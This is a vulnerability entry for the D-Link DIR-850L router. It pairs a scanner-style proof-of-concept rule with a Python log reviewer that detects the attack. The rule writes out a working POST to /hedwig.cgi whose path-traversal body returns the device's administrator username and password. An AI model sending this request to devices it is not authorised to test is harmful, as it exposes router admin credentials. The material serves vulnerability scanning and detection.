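Vulnerability Description
When the directory browsing feature of the Dlink 850l is enabled, an attacker can obtain the device's configuration information, including the administrator password, by accessing /hedwig.cgi.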
id: dlink-850l-password-leak
info:
  name: Dlink 850l Information Disclosure
  author: cc_ci
  severity: high
  verified: true
  description: |-
    当Dlink 850l的目录浏览功能开启时,攻击者可以通过访问/hedwig.cgi来获取设备的配置信息,包括管理员密码。
  tags: dlink,disclosure
  created: 2023/10/29
rules:
  r0:
    request:
      method: POST
      path: /hedwig.cgi
      headers:
        Content-Type: text/xml
        Cookie: uid=R8tBjwtFc8
      body: <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
    expression: response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
expression: r0()
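A defender-side counterpart to the rule above, added here as an example and not part of the original template: it reviews captured HTTP requests (for instance from a reverse proxy or IDS body log) and flags POSTs to /hedwig.cgi whose `<service>` element carries a path instead of a service name. The function names, the sample requests, and the assumption that legitimate `<service>` values are bare names without path separators are mine, not the page's.

```python
import re
import xml.etree.ElementTree as ET

# Assumption: a legitimate <service> value is a bare name (letters, digits,
# dot, underscore, hyphen) with no path separators.
SAFE_SERVICE = re.compile(r"^[A-Za-z0-9_.\-]+$")

def suspicious_services(body: str) -> list[str]:
    """Return <service> values in a postxml body that look like file paths."""
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        return ["<dtd-in-body>"]        # do not hand DTDs to the parser
    try:
        root = ET.fromstring(body.encode("utf-8"))
    except ET.ParseError:
        return ["<unparseable-body>"]   # malformed XML to this endpoint is worth a look
    hits = []
    for node in root.iter("service"):
        value = (node.text or "").strip()
        if ".." in value or not SAFE_SERVICE.match(value):
            hits.append(value)
    return hits

def review(requests):
    """requests: iterable of (method, path, body). Return [(path, hits), ...]."""
    alerts = []
    for method, path, body in requests:
        target = path.split("?", 1)[0]
        if method.upper() == "POST" and target.endswith("/hedwig.cgi"):
            hits = suspicious_services(body)
            if hits:
                alerts.append((path, hits))
    return alerts

# Constructed sample requests; TRAVERSAL reuses the body shown in the rule above.
HEADER = '<?xml version="1.0" encoding="utf-8"?>'
BENIGN = HEADER + "<postxml><module><service>DEVICE.ACCOUNT</service></module></postxml>"
TRAVERSAL = (HEADER + "<postxml><module><service>"
             "../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml"
             "</service></module></postxml>")
SAMPLES = [
    ("POST", "/hedwig.cgi", BENIGN),
    ("POST", "/hedwig.cgi", TRAVERSAL),
    ("GET", "/index.php", ""),
]

if __name__ == "__main__":
    for path, hits in review(SAMPLES):
        print(f"ALERT {path}: suspicious <service> values {hits}")
```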